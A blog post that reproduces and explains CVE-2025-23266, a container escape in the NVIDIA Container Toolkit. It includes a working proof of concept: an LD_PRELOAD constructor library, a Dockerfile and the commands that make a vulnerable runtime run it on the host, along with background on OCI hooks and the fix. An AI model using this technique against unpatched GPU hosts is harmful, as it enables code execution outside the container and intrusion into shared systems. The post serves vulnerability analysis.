NVIDIA Container Escape CVE 2025-23266 (aka NVIDIAEscape)

Posted Aug 5, 2025

By Filipe Paz Rodrigues

11 min read

Introduction

Wiz published on July 17, 2025 about a container escape on NVIDIA’s Container Runtime. The blog post explains in details how an exploit would work, although it does not address a few details regarding the container runtime, more specifically, how does container hooks work under the hook.

Reproducing the issue

You can reproduce the issue yourself with the following steps (they are meant for Ubuntu, but easily adaptable for other distributions):

Install and Configure Nvidia Container Toolkit

Download the Nvidia Container Toolkit version 1.17.7 or earlier. The one I used was https://github.com/NVIDIA/nvidia-container-toolkit/releases/download/v1.17.7/nvidia-container-toolkit_1.17.7_deb_amd64.tar.gz
Unpack the .deb files to ~/release-v1.17.7-stable/packages/ubuntu18.04/amd64/
Then, run the following commands in order (as sudo):

        
      
dpkg -i libnvidia-container1_1.17.7-1_amd64.deb
dpkg -i libnvidia-container-tools_1.17.7-1_amd64.deb
dpkg -i nvidia-container-toolkit-base_1.17.7-1_amd64.deb 
dpkg -i nvidia-container-toolkit_1.17.7-1_amd64.deb

Configure the NVIDIA runtime by running:

sudo nvidia-ctk runtime configure --runtime=docker

Then, restart docker with:

sudo systemctl restart docker

Some of these steps are taken from here

Create a shared library

The exploit requires a shared library to be loaded by the NVIDIA Container runtime. The following code creates one that creates a /owned file on the host:

poc.c

// poc.c - minimal malicious LD_PRELOAD library (creates /owned)

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

// This function is called when the shared library is loaded
__attribute__((constructor))
void init(void) {
    int fd = open("/owned", O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd != -1) {
        write(fd, "You have been owned!\n", 21);
        close(fd);
    }
}

Build it with:

gcc -fPIC -shared -o poc.so poc.c

We will explain later in detail how this code works.

Configure OCI hook for NVIDIA Container runtime

The createContainer OCI hook only executes when the CUDA Forward Compatibility mode is set to “hook.”

Add or edit the /etc/nvidia-container-runtime/config.toml file so it contains the following:

[nvidia-container-runtime.modes.legacy]
cuda-compat-mode = "hook"

A detailed explanation about CUDA Forward Compatibility mode will follow later on this post.

Create a docker image

This docker image will contain the poc.so library that we created on the previous step. A vulnerable runtime will load this library and execute it at host level.

Dockerfile

FROM busybox
ENV LD_PRELOAD=./poc.so
ADD poc.so /

The Dockerfile and the poc.so must be in the same folder

Then build the image with:

docker build . -t nvidiascape-exploit

The command should create a new docker image with a tag (-t) nvidiascape-exploit.

Then, run it with the following command:

docker run --rm --runtime=nvidia --gpus=all nvidiascape-exploit

If everthing work right, you should see a /owned fine at the root directory.

Understanding the issue

To properly understand how this exploit was crafted, we need to touch in a couple of subjects first:

Dynamic linker behavior
Docker alternate runtimes
CUDA Forward Compatibility
OCI Runtime Specs and Hooks

Dynamic linker behavior

Whenever an application runs, it might require shared libraries - these are binaries that are not part of the application itself, but redistributed as part of another package. The dynamic linker job is to resolve these libraries during runtime.

The dynamic linker provides a feature where shared libraries under a directory set by the LD_PRELOAD environment variable takes precedence over all others. As a debugging feature, this might sound nice, but it is damning for sensitive applications. The ld.so man pages states:

   Secure-execution mode
       For security reasons, if the dynamic linker determines that a
       binary should be run in secure-execution mode, the effects of some
       environment variables are voided or modified, and furthermore
       those environment variables are stripped from the environment, so
       that the program does not even see the definitions. 

As en experiment, try to run this on your terminal:

sudo LD_PRELOAD=/home/filiperodrigues/nvidiascape-exploit/poc.so find

You will end you with the same /owned file as the original exploit.

The poc.so itself is rather simple: upon init, it creates a /owned file, then write some content to it.

void init(void) {
    int fd = open("/owned", O_WRONLY | O_CREAT | O_TRUNC, 0644);

The initializer is provided by the __attribute__((constructor)) function attributes.

Alternate runtimes

The default Docker runctime is runc. However, you can opt to use other runtimes that implements the containerd shim API. When you ran sudo nvidia-ctk runtime configure --runtime=docker earlier, you added an entry on the /etc/docker/daemon.json file, which should look like the following:

{
    "runtimes": {
        "nvidia": {
            "args": [],
            "path": "nvidia-container-runtime"
        }
    }

That tells Docker to use the nvidia-container-runtime application whenever you run a container with --runtime=nvidia

CUDA Forward Compatibility

CUDA forward compatibility allows containers or applications that were built with a newer version of the CUDA toolkit (user-mode libraries) to run on systems where the host driver is slightly older as long as certain compatibility libraries are present. This is particularly useful for containerized workloads where:

You might build and ship containers with newer CUDA versions than what the host has installed.
Upgrading drivers on production systems isn’t always immediate or practical.

According to the documentation:

The CUDA forward compatibility package will then be installed to the versioned toolkit directory. For example, 
for the CUDA forward compatibility package of 12.8, the GPU driver libraries of 570 will be installed in /usr/local/cuda-12.8/compat/.

It is important to notice that these libraries are installed on the host.

The NVIDIA Container Runtime implements forward compatibility as an OIC hook. If the "nvidia-container-runtime.modes.legacy.cuda-compat-mode" config option is set to "hook", the “ enable-cuda-compat” is then used.

The hook will then execute and mount the compat libraries under “/usr/local/cuda/compat”. The mechanism used is called Container Device Interface.

OCI Runtime Specs and Hooks

We have mentioned OCI hooks a couple of times.

Whenever a container is created by docker, it creates a JSON Structure called OCI runctime spec configuration. OCI stands for Open Container Initiative, the governing body responsible for container standards.

According to their page:

This configuration file contains metadata necessary to implement standard operations against the container. This includes the process to run, environment variables to inject, sandboxing features to use, etc.

For example, you can define a OCI runtime spec configuration like this:

{
  "ociVersion": "1.2.1",
  "process": {
    "user": {
      "uid": 0,
      "gid": 0,
      "additionalGids": [0, 10]
    },
    "args": [
      "sh"
    ],
    "env": [
      "FOO=bar"
    ]
}

That tells the container runtime (runc) to run a container with the binary sh as the application and the environment FOO with the value of bar.

These values that are part of this spec can come from different places. For the sake of this blog post, two places are important:

The Dockerfile
The NVIDIa container runtime

When Docker “ENV” intruction on the Dockerfile, adds them to the process.env attribute on the spec.

If you have a Dockerfile like the one below:

ENV FOO=bar
RUN sh

You will end up with a spec like the one above.

The NVIDIA Container runtime is a shim for runc. According to (Github)[https://github.com/NVIDIA/nvidia-container-toolkit/tree/main/cmd/nvidia-container-runtime]:

When a create command is detected, the incoming OCI runtime specification is modified in place and the command is forwarded to the low-level runtime.

The runc create command is executed whenever a new container is created. WHen that happens , the The NVIDIA Container runtime updates the spec to add a new hook.

Hooks are applications that can run in different stages of the container lifecycle, such as:

https://specs.opencontainers.org/runtime-spec/config/#posix-platform-hooks

createRuntime
createContainer
startContainer
postStart
postStop

A container hook as created by the NVIDIA Container Runtime looks like this:

    "createContainer": [
      {
        "path": "/usr/bin/nvidia-ctk",
        "args": [
          "nvidia-ctk",
          "hook",
          "enable-cuda-compat",
          "--host-driver-version=575.64.03"
        ],
        "env": [
        ]
      },
      {
        "path": "/usr/bin/nvidia-ctk",
        "args": [
          "nvidia-ctk",
          "hook",
          "update-ldcache"
        ],
        "env": [
        ]
      }

Notice that you can specify an environent variable to the hook itself.

The createContainer hook is special because although it path resolves on the host (or the “runtime namespace”, as the spec says), the hook itself executes within the “container namespace”.

The combination of all of these is what creates this issue:

Docker adds the environment variable to the container spec
NVIDIA Container Runtime adds the createContainer hook with no environment variables
The /usr/bin/nvidia-ctk runs, leaving its environment variables unspecifies, which results in inheriting the environment variables from its parent process

The explanation on why does the /usr/bin/nvidia-ctk process inherits the parent process environment variables is on the part 2 of this post

Experimenting with nvidia-container-toolkit

If you want to undertand how the NVIDIA COntainer Runtime is implemented, you can clone the following repository with:

https://github.com/NVIDIA/nvidia-container-toolkit

This repository creates the nvidia-ctk and nvidia-container-runtime binaries, among others.

The function that creaate a new runtime spec is newNVIDIAContainerRuntime, located on internal/runtime /runtime_factory.go

The relevant parts are oci.NewSpec and newSpecModifier. These two functions:

Creates an OCI specification object (ociSpec) from the command-line args. The OCI spec describes how the container should be set up (namespaces, mounts, env vars, etc).
Creates a spec modifier - a helper object that knows how to change the original OCI spec to inject NVIDIA-specific libraries, mounts, hooks, etc, needed for GPU containers.

You can see the actual spec by doing this:

Add the following to the newNVIDIAContainerRuntime function

  if logger != nil {
      if specJSON, err := json.MarshalIndent(ociSpec, "", "  "); err == nil {
          logger.Infof("OCI Spec: %s", string(specJSON))
      } else {
          logger.Warningf("Failed to marshal OCI spec for logging: %v", err)
      }
  }

Edit the config runtime (/etc/nvidia-container-runtime/config.toml) to enable logs:

[nvidia-container-runtime]
debug = "/var/log/nvidia-container-runtime.log"

Then build it with:

make binaries

And copy the resulting file to /usr/bin/nvidia-container-runtime

After that, you should see the following output on the /var/log/nvidia-container-runtime.log file:

{
  "ociVersion": "1.2.1",
  "process": {
    "user": {
      "uid": 0,
      "gid": 0,
      "additionalGids": [0, 10]
    },
    "args": [
      "sh"
    ],
    "env": [
      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
      "HOSTNAME=e078abd14abe",
      "LD_PRELOAD=./poc.so",
      "NVIDIA_VISIBLE_DEVICES=all"
    ],
    "cwd": "/",
    "capabilities": {
      "bounding": [
        "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW",
        "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE",
        "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE"
      ],
      "effective": [
        "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW",
        "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE",
        "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE"
      ],
      "permitted": [
        "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW",
        "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE",
        "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE"
      ]
    },
    "apparmorProfile": "docker-default",
    "oomScoreAdj": 0
  },
  "root": {
    "path": "/var/lib/docker/overlay2/b29b8b924bfcb60a5b2adadd98c935fe659480f24be017259f56cf49ead0d3ed/merged"
  },
  "hostname": "e078abd14abe",
  "mounts": [
    {
      "destination": "/proc",
      "type": "proc",
      "source": "proc",
      "options": ["nosuid", "noexec", "nodev"]
    },
  ],
  "hooks": {
    "prestart": [
      {
        "path": "/usr/bin/nvidia-container-runtime-hook",
        "args": [
          "nvidia-container-runtime-hook",
          "prestart"
        ],
        "env": [
          "LANG=en_US.UTF-8",
          "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin",
          "NOTIFY_SOCKET=/run/systemd/notify",
          "INVOCATION_ID=6a71d6bbe6634f0baebf6075a9ece8b2",
          "JOURNAL_STREAM=8:22608",
          "SYSTEMD_EXEC_PID=2089",
          "OTEL_SERVICE_NAME=dockerd",
          "OTEL_EXPORTER_OTLP_TRACES_PROTOCOL=http/protobuf",
          "OTEL_EXPORTER_OTLP_METRICS_PROTOCOL=http/protobuf",
          "TMPDIR=/var/lib/docker/tmp"
        ]
      }
    ]
  },
    //etc

You will notice that the LD_PRELOAD is part of the container spec.

The fix

Before the fix, this is how the createContainer would look like:

    "createContainer": [
      {
        "path": "/usr/bin/nvidia-ctk",
        "args": [
          "nvidia-ctk",
          "hook",
          "enable-cuda-compat",
          "--host-driver-version=575.64.03"
        ]
      },
      {
        "path": "/usr/bin/nvidia-ctk",
        "args": [
          "nvidia-ctk",
          "hook",
          "update-ldcache"
        ]
      }

And this is how it would look after:

    "createContainer": [
      {
        "path": "/usr/bin/nvidia-ctk",
        "args": [
          "nvidia-ctk",
          "hook",
          "enable-cuda-compat",
          "--host-driver-version=575.64.03"
        ],
        "env": [
          "NVIDIA_CTK_DEBUG=false"
        ]
      },
      {
        "path": "/usr/bin/nvidia-ctk",
        "args": [
          "nvidia-ctk",
          "hook",
          "update-ldcache"
        ],
        "env": [
          "NVIDIA_CTK_DEBUG=false"
        ]
      }

With the fix, the createContainer has an explicit “env” section, which is not present without the fix. Since the issue was with

Final thoughts

This post should cover in depth what comes into play for this vulnerabilty to exist. The only part left out was this one:

While prestart hooks run in a clean, isolated context, createContainer hooks have a critical property: they inherit environment variables from the container image unless explicitly configured not to.

I have dedicated a second post for this here

This post is licensed under CC BY 4.0 by the author.